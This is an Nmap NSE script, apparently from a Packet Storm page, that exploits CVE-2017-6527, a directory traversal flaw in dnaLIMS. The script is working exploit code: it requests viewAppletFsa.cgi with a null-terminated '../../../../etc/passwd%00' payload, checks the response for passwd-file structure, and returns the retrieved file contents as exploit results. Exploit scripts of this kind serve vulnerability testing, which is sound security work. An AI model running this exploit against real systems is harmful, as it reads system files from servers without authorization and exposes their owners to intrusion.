This NSE script for Nmap exploits a directory traversal vulnerability in dnaTools dnaLIMS version 4-2015s13.
14000eb7e96ae44276fb5bd1d81181a295942cd488c90f9058e76d64598d4a63local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
local nmap = require "nmap"
description = [[
dnaLIMS is prone to the Directory Traversal attack.
The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated directory traversal attack.
This allows an unauthenticated attacker to retrieve files on the operating system accessible by
the permissions of the web server. This page also does not require authentication, allowing
any person on the Internet to exploit this vulnerability.
]]
---
-- @usage
-- nmap --script http-vuln-cve2017-6527 <url>
--
-- @args
-- http-vuln-cve2017-6527.uri
-- Default: '/' (Suggested)
--
-- @output
-- PORT STATE SERVICE
-- 80/tcp open http
-- | http-vuln-cve2017-6527
-- | VULNERABLE:
-- | dnaLIMS is prone to the Directory Traversal attack.
-- | State: VULNERABLE (Exploitable)
-- | IDs:
-- | CVE: CVE-2017-6527
-- | CWE: 22
-- | The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated directory traversal attack.
-- | This allows an unauthenticated attacker to retrieve files on the operating system accessible by
-- | the permissions of the web server. This page also does not require authentication, allowing
-- | any person on the Internet to exploit this vulnerability.
-- |
-- | References:
-- | https://www.cvedetails.com/cve/CVE-2017-6527
-- | https://www.cvedetails.com/cwe-details/22/cwe.html
---
author = "Rewanth Cool"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "intrusive", "exploit"}
portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")
action = function(host, port)
local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/"
local vulnPath = "cgi-bin/dna/viewAppletFsa.cgi?seqId=../../../../../../etc/passwd%00&Action=blast&hidenav=1"
-- Exploiting the vulnerability
local response = http.get( host, port, uri..vulnPath )
stdnse.debug1(string.format("GET request being processed with payload on %s", host..uri..vulnPath))
if( response.status == 200 ) then
local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
local vuln = {
title = "dnaLIMS is prone to the Directory Traversal attack.",
state = vulns.STATE.NOT_VULN,
description = [[
The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated directory traversal attack.
This allows an unauthenticated attacker to retrieve files on the operating system accessible by
the permissions of the web server. This page also does not require authentication, allowing
any person on the Internet to exploit this vulnerability.
]],
IDS = {
CVE = "CVE-2017-6527",
CWE = "22",
references = {
"https://www.cvedetails.com/cve/CVE-2017-6527",
"https://www.cvedetails.com/cwe-details/22/cwe.html"
},
dates = {
disclosure = {
year = "2017",
month = "03",
day = "09"
},
}
}
}
-- Matching the /etc/passwd pattern
if string.match( response.body, "([^:]+):([^:]+):([^:]+):([^:]+)::?([^:]+):([^:]+):([^:]+)" ) then
vuln.state = vulns.STATE.EXPLOIT
vuln.exploit_results = response.body
return vulnReport:make_output(vuln)
end
end
end
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed